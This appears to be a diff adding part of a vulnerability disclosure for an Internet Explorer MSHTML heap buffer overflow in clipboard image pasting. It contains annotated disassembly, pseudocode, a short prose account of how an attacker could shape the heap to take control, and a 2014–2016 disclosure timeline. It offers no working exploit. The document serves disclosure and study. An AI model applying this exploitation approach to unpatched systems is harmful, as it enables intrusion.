+720266f6 ff742440        push    dword ptr [esp+40h]                            larg1<stack> = po­Bitmap<stack>
+720266fa e8feb1ffff      call    720218fd                                       MSHTML!CPaste­Command::Convert­Bitmapto­Png(
+                                                                                    po­Bitmap = po­Bitmap<stack>,
+   **** SHIT HITS FAN ****                                                          u­Bitmap­Size = u­Bitmap­Size<stack>,
+                                                                                    ppo­Png­Image = &pab­Image­Data,
+                                                                                    pu­Png­Image­Size = &u­Png­Image­Size<stack>)
+720266ff ff742434        push    dword ptr [esp+34h]
+72026703 8bf0            mov     esi,eax
+72026705 e8fdc85fff      call    71623007                                       MSHTML!operator delete(...)
+7202670a 59              pop     ecx
+7202670b 85f6            test    esi,esi
+7202670d 0f8549feffff    jne     7202655c                                           goto label1;
+72026713 ff7524          push    dword ptr [ebp+24h]
+72026716 8bcb            mov     ecx,ebx
+72026718 ff751c          push    dword ptr [ebp+1Ch]
+7202671b ff7520          push    dword ptr [ebp+20h]
+7202671e ff74245c        push    dword ptr [esp+5Ch]
+72026722 ff742448        push    dword ptr [esp+48h]
+72026726 ff750c          push    dword ptr [ebp+0Ch]
+72026729 ff7508          push    dword ptr [ebp+8]
+7202672c e81ce2ffff      call    7202494d                                       MSHTML!CPaste­Command::Handle­Paste­Image(...)
+72026731 ff742438        push    dword ptr [esp+38h]
+72026735 8bf0            mov     esi,eax
+72026737 e8cbc85fff      call    MSHTML!operator delete (71623007)
+7202673c 59              pop     ecx
+7202673d e91afeffff      jmp     7202655c                                  label1
+
+7202650c 8b442410        mov     eax,dword ptr [esp+10h]
+72026510 85ff            test    edi,edi
+72026512 0f84f8000000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x3db (72026610)
+72026518 83ff01          cmp     edi,1
+7202651b 744d            je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x335 (7202656a)
+7202651d 83ff02          cmp     edi,2
+72026520 0f84d1020000    je      MSHTML!CPaste­Command::Paste­From­Clipboard+0x5c2 (720267f7)
+72026526 0f8e3a010000    jle     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72026666)
+7202652c 83ff04          cmp     edi,4
+7202652f 0f8e0d020000    jle     MSHTML!CPaste­Command::Paste­From­Clipboard+0x50d (72026742)
+72026535 83ff08          cmp     edi,8
+72026538 0f8528010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x431 (72026666)
+7202653e 50              push    eax
+7202653f ff15e0430f72    call    dword ptr [MSHTML!_imp__­Global­Lock (720f43e0)]
+72026545 8bf8            mov     edi,eax
+72026547 8b442410        mov     eax,dword ptr [esp+10h]
+7202654b 89442420        mov     dword ptr [esp+20h],eax
+7202654f 85ff            test    edi,edi
+72026551 0f8524010000    jne     MSHTML!CPaste­Command::Paste­From­Clipboard+0x446 (7202667b)
+72026557 be0e000780      mov     esi,8007000Eh
+label1:
+7202655c 8d4c2420        lea     ecx,[esp+20h]
+72026560 e819f1bfff      call    MSHTML!TSmart­Handle<void *,&Global­Unlock>::~TSmart­Handle<void *,&Global­Unlock> (71c2567e)
+72026565 e963030000      jmp     MSHTML!CPaste­Command::Paste­From­Clipboard+0x698 (720268cd)
+MSHTML!CPaste­Command..Prepend­Bitmap­Header.txt
+MSHTML!CPaste­Command­Prepend­Bitmap­Header(
+  VOID* po­Bitmap­Info<ebp+8>,
+  UINT u­Bitmap­Info­Size<ebp+C>,
+  VOID** ppo­Bitmap<ebp+10>,
+  UINT* u­Bitmap­Size<ebp+14>
+):
+  u­Bitmap­Size<ebp-4>
+72cf6985 8bff            mov     edi,edi                                        
+72cf6987 55              push    ebp                                            
+72cf6988 8bec            mov     ebp,esp                                        
+72cf698a 51              push    ecx                                            
+72cf698b 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]                        larg1<ecx> = u­Bitmap­Info­Size<ebp+C>
+72cf698e 8d45fc          lea     eax,[ebp-4]                                    &u­Bitmap­Size<eax> = &u­Bitmap­Size<ebp-4>
+72cf6991 8365fc00        and     dword ptr [ebp-4],0                            u­Bitmap­Size<ebp-4> = 0
+72cf6995 56              push    esi                                            
+72cf6996 57              push    edi                                            
+72cf6997 50              push    eax                                            larg3<stack> = &u­Bitmap­Size<eax>
+72cf6998 6a0e            push    0Eh                                            
+72cf699a 5a              pop     edx                                            larg2<edx> = 0x­E
+72cf699b e8fcd728ff      call    71f8419c                                       MSHTML!UInt­Add(                                                                 u­Bitmap­Size = u­Bitmap­Info­Size + 0x­E
+                                                                                    u­Bitmap­Info­Size<ecx>,                                                       
+                                                                                    0x­E<edx>,                                                                   h­Result = error code on integer overflow
+                                                                                    &u­Bitmap­Size<eax>);
+72cf69a0 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>
+72cf69a2 85ff            test    edi,edi                                        if (h­Result<edi> < 0)                                                           if (h­Result < 0)
+72cf69a4 7850            js      72cf69f6                                           goto return_­error;                                                              return 0x8007000E;
+72cf69a6 8b75fc          mov     esi,dword ptr [ebp-4]                          u­Bitmap­Size<esi> = u­Bitmap­Size<ebp-4>
+72cf69a9 56              push    esi                                            larg3<stack> = u­Bitmap­Size<esi>
+72cf69aa 6a00            push    0                                              larg2<stack> = 0
+72cf69ac ff3510ccd972    push    dword ptr [72d9cc10]                           larg1<stack> = MSHTML!g_­h­Process­Heap
+72cf69b2 e8eaa620ff      call    71f010a1                                       po­Bitmap<eax> = MSHTML!Heap­Alloc(                                               po­Bitmap<eax> = Heap­Alloc(g_­h­Process­Heap, 0, u­Bitmap­Size);
+                                                                                    MSHTML!g_­h­Process­Heap,
+                                                                                    0,
+                                                                                    u­Bitmap­Size<esi>);
+72cf69b7 8b4d10          mov     ecx,dword ptr [ebp+10h]                        ppo­Bitmap<ecx> = ppo­Bitmap<ebp+10>
+72cf69ba 8901            mov     dword ptr [ecx],eax                            *(ppo­Bitmap<ecx>) = po­Bitmap<eax>                                               *ppo­Bitmap = po­Bitmap
+72cf69bc 85c0            test    eax,eax                                        if (po­Bitmap<eax> == NULL)                                                      if (po­Bitmap == NULL)
+72cf69be 7436            je      72cf69f6                                           goto return_­error;                                                              return 0x8007000E;
+72cf69c0 ff750c          push    dword ptr [ebp+0Ch]                            larg4<stack> = u­Bitmap­Info­Size
+72cf69c3 b9424d0000      mov     ecx,4D42h                                      "BM"<ecx> = 0x4D42
+72cf69c8 897002          mov     dword ptr [eax+2],esi                          po­Bitmap<eax>->BITMAPFILEHEADER.bf­Size = u­Bitmap­Size<esi>                       po­Bitmap->BITMAPFILEHEADER.bf­Size = u­Bitmap­Size
+72cf69cb ff7508          push    dword ptr [ebp+8]                              larg3<stack> = po­Bitmap­Info<ebp+8>
+72cf69ce 668908          mov     word ptr [eax],cx                              po­Bitmap<eax>->BITMAPFILEHEADER.bf­Type = "BM"<cx>                               po­Bitmap->BITMAPFILEHEADER.bf­Type = "BM"
+72cf69d1 33c9            xor     ecx,ecx                                        0<ecx> = 0
+72cf69d3 ff750c          push    dword ptr [ebp+0Ch]                            larg2<stack> = u­Bitmap­Info­Size                                                  po­Bitmap->BITMAPFILEHEADER.bf­Reserved1 = 0
+72cf69d6 894806          mov     dword ptr [eax+6],ecx                          po­Bitmap<eax>->BITMAPFILEHEADER.bf­Reserved12 = 0                                po­Bitmap->BITMAPFILEHEADER.bf­Reserved2 = 0
+72cf69d9 c7400a36000000  mov     dword ptr [eax+0Ah],36h                        po­Bitmap<eax>->BITMAPFILEHEADER.bf­Off­Bits = 0x36                                po­Bitmap->BITMAPFILEHEADER.bf­Off­Bits = 0x36
+72cf69e0 83c00e          add     eax,0Eh                                        &(po­Bitmap.BITMAPINFO)<eax> = po­Bitmap<eax> + sizeof(BITMAPFILEHEADER)
+72cf69e3 50              push    eax                                            larg1<stack> = &o­Bitmap­Info<eax>
+72cf69e4 ff159841dc72    call    dword ptr [72dc4198]                           MSHTML!_imp__­memcpy_­s(                                                          memcpy_­s(&(po­Bitmap->BITMAPINFO), u­Bitmap­Info­Size, po­Bitmap­Info, u­Bitmap­Info­Size)
+                                                                                    &(po­Bitmap.BITMAPINFO)<stack>,
+                                                                                    u­Bitmap­Info­Size<stack>,
+                                                                                    po­Bitmap­Info<stack>,
+                                                                                    u­Bitmap­Info­Size<stack>);
+72cf69ea 8b4514          mov     eax,dword ptr [ebp+14h]                        pu­Bitmap­Size<eax> = pu­Bitmap­Size<ebp+14>
+72cf69ed 83c410          add     esp,10h                                        WTF!?
+72cf69f0 8930            mov     dword ptr [eax],esi                            *(pu­Bitmap­Size<eax>) = u­Bitmap­Size<esi>                                         *pu­Bitmap­Size = u­Bitmap­Size
+72cf69f2 8bc7            mov     eax,edi                                        h­Result<eax> = h­Result<edi>                                                     return s_­OK;
+72cf69f4 eb05            jmp     72cf69fb                                       goto return;
+                                                                                return_­error:
+72cf69f6 b80e000780      mov     eax,8007000Eh                                  h­Result<eax> = 0x8007000E
+                                                                                return:
+72cf69fb 5f              pop     edi                                            
+72cf69fc 5e              pop     esi                                            
+72cf69fd 8be5            mov     esp,ebp                                        
+72cf69ff 5d              pop     ebp                                            
+72cf6a00 c21000          ret     10h                                            return h­Result<eax>
+
+
+Exploit
+
+An attacker looking to exploit this issue will commonly attempt to get the memory allocated to store the PNG image in a location that is followed by a pre-allocated memory block that contains information the attacker would like to modify. Using the buffer overflow, the attacker can overwrite this pre-allocated memory block with attacker controlled data. Depending on the type of the pre-allocated memory, this could allow the attacker to read or modify arbitrary information within the process and take control of execution flow. No attempt was made to create a Proof-of-Concept that shows this level of control.
+
+Time-line
+
+8 May 2014: This vulnerability was submitted to ZDI.
+9 June 2014: This vulnerability was acquired by ZDI.
+23 June 2014: This vulnerability was disclosed to Microsoft by ZDI.
+14 October 2014: This vulnerability was address by Microsoft in MS14-056.
+21 December 2016: Details of this vulnerability are released.
+-->
\ No newline at end of file